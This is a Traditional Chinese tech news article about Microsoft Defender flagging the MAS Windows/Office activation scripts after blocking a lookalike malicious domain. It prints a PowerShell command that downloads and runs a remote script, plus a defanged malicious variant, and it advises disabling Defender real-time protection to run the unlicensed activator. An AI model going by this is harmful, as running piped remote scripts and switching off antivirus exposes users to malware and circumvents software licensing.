微軟(Microsoft)為了打擊盜版與惡意軟體,最近似乎有點「用力過猛」,竟然連網路上最知名的 Windows/Office 啟用腳本工具 MAS(Microsoft Activation Scripts)都一起封殺。
根據社群回報,使用者現在如果在 PowerShell 執行 MAS 的啟用指令,會直接被 Microsoft Defender 攔截並報錯,原因是微軟把正版 MAS 網域誤判為帶有惡意程式的釣魚網站。
事情的起因其實是微軟原本想做件好事。近期網路上出現了模仿 MAS 的惡意網站,駭客註冊了極為相似的網域,誘騙使用者下載帶有病毒的假冒版工具。微軟得知後,透過更新 Microsoft Defender 的病毒定義檔來阻擋這些惡意連結。
然而,微軟工程師在設定阻擋規則時似乎「手滑」出了包,因為現在連真正的 MAS 官方啟用指令也無法執行了。
為什麼說這是誤殺?從 Microsoft Defender 的攔截紀錄可以看到,偵測到的威脅名稱為 Trojan:PowerShell/FakeMas.DA!MTB。請注意這個名稱中的「FakeMas」(假 MAS),這顯示微軟原本的目標應該是那些冒牌貨,結果卻連正牌的 MAS 本尊也被掃到颱風尾。加上 MAS 開發團隊也在社群平台 X(前 Twitter)上證實了這個狀況,基本上可以判斷這是一場烏龍事件。
問題的根源在於正版與盜版網域實在長得太像,只有一個字母的差別:
- 真正的 MAS 啟用工具指令(Official) irm https://get.activated.win | iex
- 帶有病毒的假冒版本(Fake/Malware)irm hxxps://get.activate.win | iex (注意:假冒版網域的 activate 少了一個 d)
推測微軟在設定過濾規則時,可能設定得太過寬鬆,或是直接誤植網域,導致正版 MAS 網域被一併列入黑名單。
對於需要使用 MAS 的使用者來說,現在稍微麻煩了一點。由於 Microsoft Defender 預設是開啟的,若要順利執行指令,必須先進入 Windows 安全中心,暫時關閉「即時保護」功能,等到腳本執行完畢並成功啟用後,再重新開啟防護即可。
不過,這裡要特別發出嚴重警告:這操作有風險!因為當你關閉防護時,系統是處於無防備狀態。請務必張大眼睛確認你複製貼上的指令網域是 get.activated.win(有 d 的那個),如果你在關閉防毒的情況下誤用了釣魚網站的指令,你的電腦很可能會被植入真正的木馬或勒索軟體,到時候就真的求助無門了。
- 延伸閱讀:微軟出手!Win11檔案總管搜尋不再卡卡,記憶體釋放有感
- 延伸閱讀:微軟 Windows 11 SE 將於 2026 年終止服務,低價 Windows 裝置還有未來嗎?
- 延伸閱讀:JavaScript 創造者向微軟 Windows 11 喊話:別只顧押寶網頁使用者體驗,卻忽略原生系統!
